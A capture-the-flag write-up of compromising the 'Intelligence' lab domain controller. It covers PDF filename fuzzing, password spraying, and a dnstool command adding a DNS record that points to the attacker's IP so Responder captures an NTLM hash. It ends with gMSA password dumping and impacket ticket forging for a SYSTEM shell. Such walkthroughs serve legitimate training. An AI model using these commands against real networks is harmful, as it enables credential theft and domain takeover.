# INTELLIGENCE | 10.10.10.248

## Enumeration

    sudo nmap -v -T4 -sC -sV -oN nmap-initial IP

### Ports and Services

![nmap](img/nmap.png)

Another Domain Controller, but also running a webpage on port 80.

#### 135,445 - RPC,SMB

Doing basic enumeration on these services fails, as they do not allow guest/anonymous login. I will have to come back to these once I get credentials somehow.

#### 80 - HTTP - IIS 10.0

![webpage](img/port-80.png)

Scrolling down the page, there are two pdf documents available for download, as well as a place to add an email address to sign-up for updates. The path of the documents leaks a '/documents' dir that when you try to ago to it is a 403.

![403](img/403.png)

Running gobuster does not pull up anything besides the /documents directory that we already know about.

So that leaves us with the pdfs that we grabbed. They have a consistent filename structure - we'll come back to that in a moment. Running `exiftool` on them gives us two potential usernames, so I put those in a 'users' file:

![exiftool output](img/exiftool.png)

We can run 'kerbrute' to enumerate if these are valid domain users:

![kerbrute userenum](img/kerbrute.png)

So, back to those pdfs. They have an identical naming scheme, so we can try to fuzz the directory for more files. To do that we can use the wfuzz tool. First we need to create two lists - one with the months and one with the days. I used a simple bash loop to create those:

    for month in {01..12}; do echo $month >> months; done

Then I ran the following wfuzz command to check for hidden files on the server:

    wfuzz -c -z file,months -z file,days --hc 404 http://intelligence.htb/documents/2021-FUZZ-FUZ2Z-upload.pdf

This pulled out a lot of files, and then even more when I changed the year to 2020.

![wfuzz output](img/wfuzz.png)

Wfuzz doesn't download the files, so we can use another bash loop to search for and download all the files.

    for year in 2020 2021; do for month in `cat enum/months.txt`; do for day in `cat enum/days.txt`; do wget http://intelligence.htb/documents/$year-$month-$day-upload.pdf 2>/dev/null; done; done; done

This grabs a ton of files. Then I run 'exiftool' on the files and grep for the Creator param, redirect into a file, and now I have a file with a bunch of usernames. I clean out the stuff I don't need, then sort for unique and I have a new user list.

Running kerbrute again gives me 30 valid users.

Now I use GetNPUsers.py to see if any of them will send me a hash, but no luck there.

![GetNPUsers.py](img/npusers.png)

Which leaves me with going through all the goddamn files manually??! So I made my own terrible and barely-working python script that would open each pdf and extract the text.

![my terrible script](img/readpdf.png)

Then I piped the output to grep. Eventually grepping out a couple lines before and after I was able to acquire what might be a password?

![password?](img/grep.png)

So armed with that and the list of users, it is time to spray:

![CrackMapExec SMB](img/cme-smb.png)

So we have a valid login. I was able to use those credentials to enumerate RPC and SMB. We have access to the user's home directory (to see the flag) as well as a powershell script in another directory. Unfortunately this user is not allowed to PSRemote, so we don't have a shell.

## Enumerating the Powershell script

The powershell script seems to use the other user's (Ted) credentials to log into the LDAP server and grab a list of computers where the name begins with "web' - then sends a web request to them and if the status is not 200, it emails a notification to Ted.

![powershell script](img/PS.png)

## Exploitation

This had me stumped so I had to look up this portion. If it is possible for the user to add DNS records then you can have Ted make a web request to an arbitrary location ie the attacker's IP address. There is a script called dnstool that can add DNS records. It comes with the [krbrelayx](https://github.com/dirkjanm/krbrelayx) tool.

### Exploit Method

I used the following command to add an A record to the DNS:

    krbrelayx-dnstool -u intelligence\\Tiffany.Molina -p <password> -a add -r web-mnemonic.intelligence.htb -d 10.10.14.16 -t A 10.10.10.248

And to verify it was added I replaced 'add' in the above command with 'query'.

Then I started responder and waited about 5 minutes. Eventually a hash came through:

![Responder](img/ntlm.png)

This was quickly cracked by hashcat and now we have Ted's credentials.

## Privilege Escalation - Ted > Administrator

These credentials do not give us a shell either, as Ted is also forbidden from PSRemoting in.

### Further Enumeration

We can use the domain enumeration tool bloodhound to grab as much data as we can and then map them out graphically. The thing that stands out the most is Ted's membership in the ITSupport group, which is allowed to read the GMSAPassword of the SVC_INT account, which is a service account.

![bloodhound](img/bloodhound.png)

GMSA stands for Group Managed Service Account, and the SVC_INT account is a GMSA. Having the ability to read the password can allow an attacker to impersonate the account, leading to further compromise. The notes in bloodhound suggest using [this exe](https://github.com/rvazarkar/GMSAPasswordReader), but we don't have a shell on the box, so I had to find something else that could run remotely. Best way to do that is to search for what you want to do and add the words python and github, which brings me to [here](https://github.com/micahvandeusen/gMSADumper/blob/main/gMSADumper.py). 

### Exploit method

The first part is seeing if we can grab the GMSA password hash using the tool. Using Ted's credentials allowed me to do so:

![GMSA password dumped](img/gmsa-hash.png)

Next step is trying to delegate to the WWW service on the DC and impersonate another user. We can see that the WWW service is the one we can delegate to by looking closely at the bloodhound graph:

![delegate to WWW service](img/delegate.png)

We can do this by using the 'getST' tool by impacket. This tool leverages our delegate privileges by providing the svc_int hash, to get a ticket of any user we wish. In this case we want to impersonate the administrator.

![getST.py](img/getST.png)

Final step is to export the variable 'KRB5CCNAME' and run 'psexec', also from impacket, and we can gain a shell on the machine as NT AUTHORITY:

![shell as NT AUTHORITY\SYSTEM](img/root-shell.png)

## Conclusion

This was a kind of challenging box that did not let you get a shell until the very end. This helps you to learn how to do many things remotely using tools that are available in Linux, without having to resort to compiling anything on Windows, which I am not a fan of anyways. I had a bit of difficulty with the ccache file at the end - but it is important that you use the exact information required when you run the 'getST' tool, as the first time I ran it I forgot to add the '.htb' at the end of the service account part, and I kept getting Kerberos authentication errors. Also there is the matter of making sure your clock skew is not too great since Kerberos auth relies on time.

**Steps taken:**

* Find PDF documents on website, fuzz dates in filenames to grab all of them
* Search all PDFs for text clues, find credentials, compromise one user
* Access PowerShell script, use tool to add DNS entry, grab user hash, crack it
* Enumerate domain with bloodhound, see unique privs
* Use privs to grab service account hash, use hash to impersonate administrator to get ticket
* Gain shell as SYSTEM
